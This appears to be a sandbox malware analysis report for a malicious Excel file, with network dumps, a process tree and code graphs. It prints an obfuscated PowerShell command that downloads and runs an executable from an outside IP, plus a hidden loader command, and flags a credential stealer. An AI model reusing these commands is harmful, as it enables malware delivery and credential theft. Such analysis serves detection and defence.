                                                        2024-10-28 10:22:52 UTC8000INData Raw: 95 68 86 a9 8b f3 7f 23 a1 11 52 d6 bf 41 2d f5 f3 8c 92 b4 35 05 b1 a1 f9 c4 e2 29 5b 99 83 05 72 b8 71 71 d7 1f 3e 2f c3 10 6e 72 77 5b 02 c0 77 3f a3 0a e2 61 4f 65 83 e0 32 e6 7d 48 28 21 4d c9 fc 90 cf e5 4a 81 bd 0c d7 1a 45 46 55 e1 c3 00 65 3a e6 82 c4 d8 16 ac 3f f7 73 62 3c 4b 71 7f ec c1 9d 95 06 d2 e4 24 82 ac 74 bb 13 f3 3d d2 40 59 2a 87 ac 9f df 94 85 ee 2c 93 7e a9 97 04 a0 2f b3 91 be a8 00 dd 93 40 7f 38 74 6e 1a 7e 47 80 5b c5 3d 6e 3d ac ef 56 60 9c 7f ea f4 5f 3a 26 ec e8 7b 2d 69 08 8f 15 4a 2e 1b e0 1d 08 06 af 0c fc 88 81 04 bb ca 7f 7f da 28 85 87 29 1c af e8 81 f2 7d af f5 af 8c 74 3d b4 fd 94 7f 49 a5 b4 b9 9c 2f ae 8c 66 e7 2b 28 fa 53 52 fe 8d a6 21 0d 79 8f 78 e7 fe f8 c4 23 e6 aa 56 c2 a6 63 66 5f 8c 4d 5a 70 89 2c 07 69 d7
                                                        Data Ascii: h#RA-5)[rqq>/nrw[w?aOe2}H(!MJEFUe:?sb<Kq$t=@Y*,~/@8tn~G[=n=V`_:&{-iJ.()}t=I/f+(SR!yx#Vcf_MZp,i
                                                        2024-10-28 10:22:52 UTC8000INData Raw: 7e b7 a9 43 b5 f2 81 8e 91 6c de 6a d6 fb 6a bb f2 85 a6 21 0d 70 8f 64 9e fe f8 c8 38 85 ab 56 df 78 73 6c 5f 72 bf 5e 71 07 45 d9 64 d6 83 d3 c7 40 aa 1e e3 dc e9 36 f3 fe cf 6e 27 fe c6 ce 99 80 c7 7f ab 0b 79 11 7a e3 3b b3 9f dc 41 71 eb fa 8d 96 35 4d 99 f3 40 52 6d 7d d1 1b a2 3d 9d a7 1c f7 a3 80 80 af 16 f9 ab 32 05 b3 6a 4b 3a 42 da 9e e2 98 a5 48 8c 02 15 76 e7 85 8c 06 e3 f1 b9 81 72 38 ef 48 a4 ce 73 82 73 da c8 5b 74 01 16 b1 ec 5a 0d 53 ca 56 44 61 7d 14 2f 85 95 28 81 38 01 dd 72 a0 ae 3f e8 1a db ea aa 10 50 3b c6 be c9 fb a1 d6 d5 19 45 19 7c de cd 37 f5 ae 63 1f 76 83 c9 4a 01 26 4d 48 71 af a0 41 dc fd 7d e7 44 0b c5 d9 61 82 62 be 13 8b cd 37 0e 6d 35 84 5c 2b b2 3f 02 75 c7 e1 32 8c cd ae 71 01 1c d0 3d 72 11 95 a0 53 a6 99 06 a9 8c
                                                        Data Ascii: ~Cljj!pd8Vxsl_r^qEd@6n'yz;Aq5M@Rm}=2jK:BHvr8Hss[tZSVDa}/(8r?P;E|7cvJ&MHqA}Dab7m5\+?u2q=rS
                                                        2024-10-28 10:22:52 UTC8000INData Raw: f5 77 b3 63 0b c5 d8 bf 8d 6b be 13 f8 89 3e 0e 4c cf 8a 48 2b b2 32 2f 64 e7 e1 32 72 c1 8a 71 ff 12 d0 15 fd 14 95 aa ce a6 9b 1b a9 e3 32 ba 92 65 a2 24 d9 ce 39 6b 09 ce 26 13 5f 7c 95 41 e2 6a 6b b8 61 3c 8c 4d af 40 64 26 37 64 76 3c cd 6e bd 17 b7 f7 48 07 fd 1b bf 83 75 49 1e 58 96 b9 b7 10 38 d7 d4 70 7f 85 cd 86 1e 0f f6 d7 02 8a 55 dd a8 74 dd 1a e5 22 b6 a3 87 e8 3b 0e 35 1d 65 f1 0b bc 12 87 a4 8a 7b 19 49 6d cd e3 98 b5 50 7f 5f 1d 49 c7 09 e2 19 f8 16 de 7e 8c a9 ea fe 96 99 52 17 4f 5b ee 4a 40 0c 1d 4a 8d 83 b2 c9 3c a9 5f 0d 2a d3 6e 4a 01 b2 16 6b 6f e7 81 c2 d4 7b e2 2d 5d 87 dc c5 a6 bd 15 63 02 f7 11 b5 21 78 4d 3e d6 a6 70 49 1a 8f 84 02 01 ab 18 c5 a6 5c 06 8c 05 f4 9d 7c 80 e8 b7 34 5c 8e fd c8 2b b0 b8 d8 d7 f1 ac 92 14 bd fb 00
                                                        Data Ascii: wck>LH+2/d2rq2e$9k&_|Ajka<M@d&7dv<nHuIX8pUt";5e{ImP_I~RO[J@J<_*nJko{-]c!xM>pI\|4\+
                                                        2024-10-28 10:22:52 UTC8000INData Raw: 17 4b d3 72 44 c0 ff ab 70 61 d7 71 85 3d 60 c5 19 c5 98 db f5 75 fa bb 15 7c 80 e2 b7 37 5c 8e d5 f7 27 b9 b2 c2 ea 0e 53 6d 37 ac c2 17 13 16 c2 97 06 a6 1d 75 41 44 8c bf 3d 12 7f c6 4a 22 43 3a 0a ac 21 df 72 c3 e3 bf f9 03 b4 55 29 55 9e 96 1c 4a fc d2 1e f3 bb c1 32 fd 90 24 6a 30 fb c0 0f d9 cb ca c1 dc 8c 64 d3 e9 e6 37 cd c8 c4 41 f5 c9 1b 69 1f d4 cf b0 e1 4e f4 61 3d ad 53 63 ab 5f ac f6 2f de d3 04 4c 20 cf 6b 27 44 7e 5d 4e 83 d1 4b 09 70 76 56 1d 2d 95 1a 26 ad 9a f0 7a 99 03 aa 0f 63 aa af a4 d9 28 63 0d f6 ab 37 94 df 45 b6 17 6c c5 0f 62 a2 05 04 e6 9b 8b db 7d da 9e 32 2c d4 05 c0 7e ed 61 1b d3 b7 e8 5d b5 04 32 ce d9 4a c2 1c 83 48 e1 5f 13 fb 0c 26 10 48 8c 1d de 4b 0e 3f 3e 3d 9e e3 c4 83 b8 d3 81 58 49 4a 60 f8 75 94 2b 32 45 af 14
                                                        Data Ascii: KrDpaq=`u|7\'Sm7uAD=J"C:!rU)UJ2$j0d7AiNa=Sc_/L k'D~]NKpvV-&zc(c7Elb}2,~a]2JH_&HK?>=XIJ`u+2E
                                                        2024-10-28 10:22:52 UTC8000INData Raw: 5d 4d fb 05 d9 d9 6a c1 e2 8f 45 1f af 15 f5 0c 42 e2 4c 88 3d fd 58 0e 3f c0 c2 a9 f0 c4 83 46 21 82 59 69 3e 60 f9 75 60 0a 0b 5d af 14 0e ab 89 9f dd 65 6f a2 6e 39 10 c9 13 7f 0d 6d 78 9e 6f e1 17 2c 92 43 9d 3e 57 a7 77 01 c6 1a 4f d5 1e 7c ab 13 20 7e 2f 55 ce 89 b4 f3 0f 35 ad f3 b0 ea 0c a5 d4 f4 d3 e3 50 8b 56 67 90 74 7f 6d 0e 6b 82 c4 76 c0 8a 67 86 6f 27 a7 70 08 72 ea 9b c9 31 2f c5 f2 72 d0 19 0a f6 6f a6 3a 0a d9 43 20 da 2c 80 46 87 1d ab 8c 5b 63 73 61 67 1e 08 71 a2 1f ec 6b c8 ac e3 6a 69 65 09 36 b9 90 61 e7 99 48 52 91 f0 82 a3 ce 7e 40 e1 c2 54 77 d2 fb d8 17 c8 e2 be fc 7b b1 38 12 dc d9 2f e1 6d 5a 0d 64 88 2c ef 2b 71 4e 7b f9 30 69 41 01 db 37 7d 35 3f 1c 31 f8 e1 f9 b4 07 5f fe 30 41 30 03 d1 85 46 7c 99 48 9f d3 9f b0 ca 1e d3
                                                        Data Ascii: ]MjEBL=X?F!Yi>`u`]eon9mxo,C>WwO| ~/U5PVgtmkvgo'pr1/ro:C ,F[csagqkjie6aHR~@Tw{8/mZd,+qN{0iA7}5?1_0A0F|H
                                                        2024-10-28 10:22:52 UTC8000INData Raw: 50 c9 d3 4e e9 10 f6 61 b0 77 f9 ce 9a 50 07 25 53 44 2c 3f 77 a0 d3 e6 f9 96 e9 2c e2 3b bf 36 2d 2f 77 42 75 f6 2d 96 d3 95 66 27 00 d3 80 a2 cf d8 6c 2e 22 1c 15 f2 4f 86 fc 0e eb 63 e3 61 80 03 8e d4 b5 6d e9 c0 8a d3 78 03 ad 11 72 d5 41 4f 2c 86 ee 73 9e bf cb 2b ae a1 07 c8 10 28 0d 90 82 05 78 6e 62 70 d7 66 3d 21 ce 16 ff 17 7b 5b 24 e1 63 3f a3 53 3c 6e 4e 65 83 46 b3 a3 7d 68 39 df 43 c7 02 b1 f6 f2 4a 81 43 fc d4 1a 65 35 df e1 c3 f8 04 43 e7 f0 f9 fa 07 dc c1 f9 9c 6c 1d 4b 71 81 e0 3e 93 a7 09 a1 8f 25 7c ab b3 a2 00 f3 c3 20 40 59 d4 f8 52 9f ff 92 ea 87 2d 6d 74 84 87 6b 80 2e 4d 95 99 56 0c 2f 9f 2e 5e 19 5e 64 e4 72 b5 81 0d f0 3c 6e 37 ac ef 58 60 cf 62 eb f4 59 c4 6f 3d e8 7d 0d 02 06 8f 15 b4 00 1a e0 1d f6 f4 a0 1e dc b2 88 04 bb 34
                                                        Data Ascii: PNawP%SD,?w,;6-/wBu-f'l."OcamxrAO,s+(xnbpf=!{[$c?S<nNeF}h9CJCe5ClKq>%| @YR-mtk.MV/.^^dr<n7X`bYo=}4
                                                        2024-10-28 10:22:52 UTC8000INData Raw: 19 5e 68 e4 72 b2 81 0d 54 3d 6e 37 8f e5 56 60 ef 44 36 f4 59 55 4f 13 e4 7b 0d 62 09 8f 15 b4 78 e4 ee 1b f6 f4 a2 0a dc 74 8d 00 bb 5b e6 47 c8 2e a5 86 5a 74 ae b1 b9 f1 8d 50 0a 71 83 75 3d 9e 23 9d 7e 49 a5 b4 bb 90 2f 8e 6f 6a ea 2b f6 ff 6a 45 fe 73 a7 e6 0f 79 8f 0b ce f2 f9 c2 66 af ae 56 c4 86 83 68 52 8c b3 aa 7d 84 2c d9 60 d6 83 d3 07 5a 93 8f e3 f4 ab 16 d3 f4 31 62 a0 ba 38 c2 9a a5 3f 41 aa 0b 7b 56 b4 e3 3b b3 9f dc 40 71 35 e6 9f 96 15 c1 dd f3 40 0b b6 a3 72 1a 5c 35 a7 2a e2 fb b8 7e 00 c5 29 84 58 cd fa 3e f2 4a 3a 37 4f 91 e6 9e 86 48 87 02 eb 5c 12 89 73 0a 15 ff c7 89 bf 4d 9f 27 0a 30 7f 8c 07 11 c1 5b 75 4e 88 b0 ec 5c a0 1b ca 56 45 61 72 f9 23 7f 99 54 19 19 01 db 52 a0 8e 3f e8 e4 d9 e2 05 10 50 31 a5 41 a5 d1 84 47 9a e6 bb
                                                        Data Ascii: ^hrT=n7V`D6YUO{bxt[G.ZtPqu=#~I/oj+jEsyfVhR},`Z1b8?A{V;@q5@r\5*~)X>J:7OH\sM'0[uN\VEar#TR?P1AG


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:06:21:02
                                                        Start date:28/10/2024
                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                        Imagebase:0x13f980000
                                                        File size:28'253'536 bytes
                                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:4
                                                        Start time:06:21:26
                                                        Start date:28/10/2024
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                        Imagebase:0x13f780000
                                                        File size:13'824 bytes
                                                        MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:06:21:30
                                                        Start date:28/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))"
                                                        Imagebase:0x13f4e0000
                                                        File size:443'392 bytes
                                                        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:06:21:33
                                                        Start date:28/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE
                                                        Imagebase:0x13f4e0000
                                                        File size:443'392 bytes
                                                        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:06:21:36
                                                        Start date:28/10/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline"
                                                        Imagebase:0x13f5c0000
                                                        File size:2'758'280 bytes
                                                        MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:06:21:37
                                                        Start date:28/10/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6549.tmp" "c:\Users\user\AppData\Local\Temp\muz5o0kx\CSCE919D41A8D904501847FAAE39BA08A1.TMP"
                                                        Imagebase:0x13f6a0000
                                                        File size:52'744 bytes
                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:06:21:42
                                                        Start date:28/10/2024
                                                        Path:C:\Users\user\AppData\Roaming\wlanext.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\wlanext.exe"
                                                        Imagebase:0x400000
                                                        File size:738'435 bytes
                                                        MD5 hash:2F9C0BA283506D8333E4F59B29FBEBA3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:06:21:43
                                                        Start date:28/10/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "
                                                        Imagebase:0x860000
                                                        File size:427'008 bytes
                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:06:22:40
                                                        Start date:28/10/2024
                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                        Imagebase:0x1f0000
                                                        File size:73'216 bytes
                                                        MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.629304100.0000000022061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Call Graph

                                                        • Entrypoint
                                                        • Decryption Function
                                                        • Executed
                                                        • Not Executed
                                                        • Show Help
                                                        callgraph 1 Error: Graph is empty

                                                        Module: Sheet1

                                                        Declaration
                                                        LineContent
                                                        1

                                                        Attribute VB_Name = "Sheet1"

                                                        2

                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                        3

                                                        Attribute VB_GlobalNameSpace = False

                                                        4

                                                        Attribute VB_Creatable = False

                                                        5

                                                        Attribute VB_PredeclaredId = True

                                                        6

                                                        Attribute VB_Exposed = True

                                                        7

                                                        Attribute VB_TemplateDerived = False

                                                        8

                                                        Attribute VB_Customizable = True

                                                        Module: Sheet2

                                                        Declaration
                                                        LineContent
                                                        1

                                                        Attribute VB_Name = "Sheet2"

                                                        2

                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                        3

                                                        Attribute VB_GlobalNameSpace = False

                                                        4

                                                        Attribute VB_Creatable = False

                                                        5

                                                        Attribute VB_PredeclaredId = True

                                                        6

                                                        Attribute VB_Exposed = True

                                                        7

                                                        Attribute VB_TemplateDerived = False

                                                        8

                                                        Attribute VB_Customizable = True

                                                        Module: Sheet3

                                                        Declaration
                                                        LineContent
                                                        1

                                                        Attribute VB_Name = "Sheet3"

                                                        2

                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                        3

                                                        Attribute VB_GlobalNameSpace = False

                                                        4

                                                        Attribute VB_Creatable = False

                                                        5

                                                        Attribute VB_PredeclaredId = True

                                                        6

                                                        Attribute VB_Exposed = True

                                                        7

                                                        Attribute VB_TemplateDerived = False

                                                        8

                                                        Attribute VB_Customizable = True

                                                        Module: ThisWorkbook

                                                        Declaration
                                                        LineContent
                                                        1

                                                        Attribute VB_Name = "ThisWorkbook"

                                                        2

                                                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                        3

                                                        Attribute VB_GlobalNameSpace = False

                                                        4

                                                        Attribute VB_Creatable = False

                                                        5

                                                        Attribute VB_PredeclaredId = True

                                                        6

                                                        Attribute VB_Exposed = True

                                                        7

                                                        Attribute VB_TemplateDerived = False

                                                        8

                                                        Attribute VB_Customizable = True

                                                        Reset < >
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000003.413899529.0000000002C60000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_3_2c60000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: 3779b0007717dc0d89e10f07eda48ea6c5d6c37e5183cd1089fa92b2cedef2cd
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash:
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000003.413899529.0000000002C60000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_3_2c60000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: 3779b0007717dc0d89e10f07eda48ea6c5d6c37e5183cd1089fa92b2cedef2cd
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash:
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000003.413899529.0000000002C60000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_3_2c60000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: 3779b0007717dc0d89e10f07eda48ea6c5d6c37e5183cd1089fa92b2cedef2cd
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash:

                                                          Execution Graph

                                                          Execution Coverage:5.5%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:50%
                                                          Total number of Nodes:6
                                                          Total number of Limit Nodes:0
                                                          execution_graph 2063 7fe899a4b18 2065 7fe899a5a40 URLDownloadToFileW 2063->2065 2066 7fe899a5b10 2065->2066 2059 7fe899a59f1 2060 7fe899a5a01 URLDownloadToFileW 2059->2060 2062 7fe899a5b10 2060->2062

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.456865034.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7fe899a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID: DownloadFile
                                                          • String ID:
                                                          • API String ID: 1407266417-0
                                                          • Opcode ID: fb6ac3ec21f27e4ed730a7bd83539618ad7b6c7fad542b6796b6c4c27b6fc0c7
                                                          • Instruction ID: a3034979e42bdcc2349a0d30174b318632817ecf3246bd664ebd4a9813ca6cb4
                                                          • Opcode Fuzzy Hash: fb6ac3ec21f27e4ed730a7bd83539618ad7b6c7fad542b6796b6c4c27b6fc0c7
                                                          • Instruction Fuzzy Hash: 69319F31A18A5C8FDB58DF5C98857A9BBE1FB59721F00822ED04ED3661CB70A8068B81

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.456865034.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7fe899a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID: DownloadFile
                                                          • String ID:
                                                          • API String ID: 1407266417-0
                                                          • Opcode ID: db173c4a69150a320a2f7a00e63a2d117a35e40b2a386b88e8286f526d1f77cb
                                                          • Instruction ID: 4a49864bbae27da90d78aae7337e60e8ac1c7fef68cfabd94b62d5724f1b32a8
                                                          • Opcode Fuzzy Hash: db173c4a69150a320a2f7a00e63a2d117a35e40b2a386b88e8286f526d1f77cb
                                                          • Instruction Fuzzy Hash: 0641133191CB889FDB19DB589C447BABBF0FB56321F04826FD08DD7162CB246806C782

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 26 7fe89a72679-7fe89a72729 27 7fe89a72c0d-7fe89a72cc6 26->27 28 7fe89a7272f-7fe89a72739 26->28 29 7fe89a7273b-7fe89a72748 28->29 30 7fe89a72752-7fe89a72759 28->30 29->30 31 7fe89a7274a-7fe89a72750 29->31 32 7fe89a7275b-7fe89a7276e 30->32 33 7fe89a72770 30->33 31->30 35 7fe89a72772-7fe89a72774 32->35 33->35 38 7fe89a72b88-7fe89a72b92 35->38 39 7fe89a7277a-7fe89a72786 35->39 40 7fe89a72b94-7fe89a72ba4 38->40 41 7fe89a72ba5-7fe89a72bb5 38->41 39->27 42 7fe89a7278c-7fe89a72796 39->42 44 7fe89a72bb7-7fe89a72bbb 41->44 45 7fe89a72bc2-7fe89a72c0c 41->45 46 7fe89a72798-7fe89a727a5 42->46 47 7fe89a727b2-7fe89a727c2 42->47 44->45 46->47 48 7fe89a727a7-7fe89a727b0 46->48 47->38 52 7fe89a727c8-7fe89a727fc 47->52 48->47 52->38 58 7fe89a72802-7fe89a7280e 52->58 58->27 59 7fe89a72814-7fe89a7281e 58->59 60 7fe89a72837-7fe89a7283c 59->60 61 7fe89a72820-7fe89a7282d 59->61 60->38 63 7fe89a72842-7fe89a72847 60->63 61->60 62 7fe89a7282f-7fe89a72835 61->62 62->60 63->38 64 7fe89a7284d-7fe89a72852 63->64 64->38 65 7fe89a72858-7fe89a72867 64->65 67 7fe89a72877 65->67 68 7fe89a72869-7fe89a72873 65->68 71 7fe89a7287c-7fe89a72889 67->71 69 7fe89a72893-7fe89a7291e 68->69 70 7fe89a72875 68->70 78 7fe89a72920-7fe89a7292b 69->78 79 7fe89a72932-7fe89a72954 69->79 70->71 71->69 72 7fe89a7288b-7fe89a72891 71->72 72->69 78->79 80 7fe89a72956-7fe89a72960 79->80 81 7fe89a72964 79->81 82 7fe89a72980-7fe89a72a0e 80->82 83 7fe89a72962 80->83 84 7fe89a72969-7fe89a72976 81->84 91 7fe89a72a10-7fe89a72a1b 82->91 92 7fe89a72a22-7fe89a72a40 82->92 83->84 84->82 85 7fe89a72978-7fe89a7297e 84->85 85->82 91->92 93 7fe89a72a50 92->93 94 7fe89a72a42-7fe89a72a4c 92->94 97 7fe89a72a55-7fe89a72a63 93->97 95 7fe89a72a6d-7fe89a72afd 94->95 96 7fe89a72a4e 94->96 104 7fe89a72aff-7fe89a72b0a 95->104 105 7fe89a72b11-7fe89a72b6a 95->105 96->97 97->95 99 7fe89a72a65-7fe89a72a6b 97->99 99->95 104->105 108 7fe89a72b72-7fe89a72b87 105->108
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.456945920.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7fe89a70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 975ee71ccf198ba0d789082a40ee41432b6f96f29b32d7d5f327a24bec29ba60
                                                          • Instruction ID: 9775992de1f56593c3a021843d3aecded6bee95a51e92f7e4e8727e3f8192164
                                                          • Opcode Fuzzy Hash: 975ee71ccf198ba0d789082a40ee41432b6f96f29b32d7d5f327a24bec29ba60
                                                          • Instruction Fuzzy Hash: E722F230A0CB894FE759DB2C84556797FE2FF9A344F2801EAD48EC72A3DA24AC55C741

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
